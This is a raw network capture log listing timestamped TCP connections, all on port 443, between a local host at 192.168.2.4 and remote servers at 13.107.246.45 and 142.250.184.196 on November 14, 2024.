                            Nov 14, 2024 23:38:59.838965893 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.839092970 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.839107990 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.852404118 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.852847099 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.852880955 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.853147030 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.853154898 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.983869076 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.983937025 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.984075069 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.984349966 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.984349966 CET55184443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.984385014 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.984402895 CET4435518413.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.986670017 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.986740112 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:59.986820936 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.987018108 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:59.987032890 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.029983044 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:39:00.030332088 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:39:00.030397892 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:39:00.030874968 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:39:00.031877995 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:39:00.032041073 CET44355185142.250.184.196192.168.2.4
                            Nov 14, 2024 23:39:00.072403908 CET55185443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:39:00.159833908 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.169529915 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.169562101 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.170849085 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.170876026 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.213552952 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.213999033 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.214060068 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.214965105 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.215018034 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.297846079 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.297904968 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.297986031 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.298260927 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.298260927 CET55186443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.298295975 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.298312902 CET4435518613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.301960945 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.301995039 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.302294016 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.302352905 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.302366972 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.318233967 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.318968058 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.319016933 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.319835901 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.319849014 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.346131086 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.346404076 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.346589088 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.346590042 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.346590042 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.349708080 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.349747896 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.349809885 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.349911928 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.349919081 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.453775883 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.453896999 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.454032898 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.454224110 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.454272032 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.454299927 CET55188443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.454315901 CET4435518813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.457638979 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.457736969 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.457824945 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.457907915 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.457928896 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.609826088 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.610336065 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.610373020 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.611053944 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.611062050 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.649656057 CET55187443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.649722099 CET4435518713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.733376026 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.734030008 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.734071970 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.734627008 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.734642982 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.749475956 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.749944925 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.750021935 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.750396013 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.750396013 CET55189443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.750436068 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.750463963 CET4435518913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.754369974 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.754403114 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.755072117 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.755176067 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.755182028 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.864912987 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.865228891 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.865446091 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.865519047 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.865519047 CET55190443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.865561008 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.865585089 CET4435519013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.867760897 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.867854118 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:00.867953062 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.868148088 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:00.868172884 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.032318115 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.032669067 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.032708883 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.033031940 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.033045053 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.165322065 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.165523052 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.165581942 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.165819883 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.165821075 CET55191443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.165864944 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.165890932 CET4435519113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.170496941 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.170525074 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.170593023 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.170692921 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.170697927 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.300576925 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.301003933 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.301038027 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.301419020 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.301424026 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.356878042 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.357304096 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.357369900 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.357656002 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.357708931 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.434653997 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.434726954 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.434803963 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.434935093 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.434948921 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.434971094 CET55192443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.434978008 CET4435519213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.437650919 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.437699080 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.437767029 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.437886000 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.437895060 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.488522053 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.488643885 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.488815069 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.488992929 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.488992929 CET55193443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.489038944 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.489069939 CET4435519313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.493941069 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.496877909 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.496896029 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.498161077 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.498167992 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.499963999 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.499991894 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.500087976 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.500361919 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.500374079 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.597759008 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.598401070 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.598464012 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.599210024 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.599224091 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.645596981 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.645837069 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.645888090 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.646461010 CET55194443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.646476030 CET4435519413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.652282000 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.652371883 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.652524948 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.653399944 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.653435946 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.726330996 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.726402044 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.726475954 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.726811886 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.726811886 CET55195443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.726880074 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.726922035 CET4435519513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.729742050 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.729829073 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.729929924 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.730160952 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.730199099 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.901359081 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.901988029 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.902000904 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:01.902456045 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:01.902467012 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.031234026 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.031785011 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.031883955 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.031963110 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.031963110 CET55196443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.031977892 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.031987906 CET4435519613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.035125017 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.035222054 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.035630941 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.035850048 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.035885096 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.170675993 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.171262980 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.171360970 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.172027111 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.172043085 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.250617981 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.251425982 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.251436949 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.252106905 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.252111912 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.300374985 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.300527096 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.300698042 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.300791025 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.300791979 CET55197443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.300847054 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.300878048 CET4435519713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.303914070 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.304008961 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.304092884 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.304368019 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.304405928 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.382155895 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.382455111 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.382539988 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.382781982 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.382797003 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.388227940 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.388492107 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.388612986 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.388633013 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.388645887 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.388655901 CET55198443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.388659954 CET4435519813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.390410900 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.390500069 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.390584946 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.390724897 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.390746117 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.464250088 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.464787006 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.464848995 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.465137959 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.465193033 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.518342018 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.518408060 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.518666029 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.518666029 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.518666029 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.520633936 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.520682096 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.520746946 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.520899057 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.520910978 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.593837023 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.594067097 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.594336987 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.594337940 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.594337940 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.596517086 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.596585989 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.596708059 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.596853971 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.596868038 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.791254997 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.792442083 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.792505026 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.793287039 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.793302059 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.821535110 CET55199443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.821568966 CET4435519913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.899682045 CET55200443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.899745941 CET4435520013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.934453011 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.934612989 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.934842110 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.935374022 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.935374022 CET55201443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.935437918 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.935475111 CET4435520113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.942146063 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.942203045 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:02.942272902 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.942465067 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:02.942477942 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.052725077 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.053287029 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.053350925 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.054234982 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.054250002 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.127775908 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.128107071 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.128168106 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.128885031 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.128899097 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.186244965 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.186369896 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.186646938 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.187381029 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.187381029 CET55202443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.187449932 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.187485933 CET4435520213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.193408966 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.193496943 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.193572998 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.199681997 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.199717045 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.256794930 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.259469032 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.259679079 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.259860992 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.288157940 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.288192034 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.289242029 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.289248943 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.289658070 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.289727926 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.289767027 CET55203443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.289783955 CET4435520313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.307686090 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.307729006 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.307836056 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.307956934 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.307966948 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.341583967 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.348881006 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.348939896 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.349560022 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.349574089 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.417138100 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.417206049 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.417346001 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.460160017 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.460160017 CET55204443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.460196972 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.460211992 CET4435520413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.478049994 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.478204966 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.478275061 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.483202934 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.483233929 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.483427048 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.483911991 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.483947992 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.483994007 CET55205443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.484009981 CET4435520513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.519499063 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.519578934 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.536056042 CET55210443192.168.2.413.107.246.45
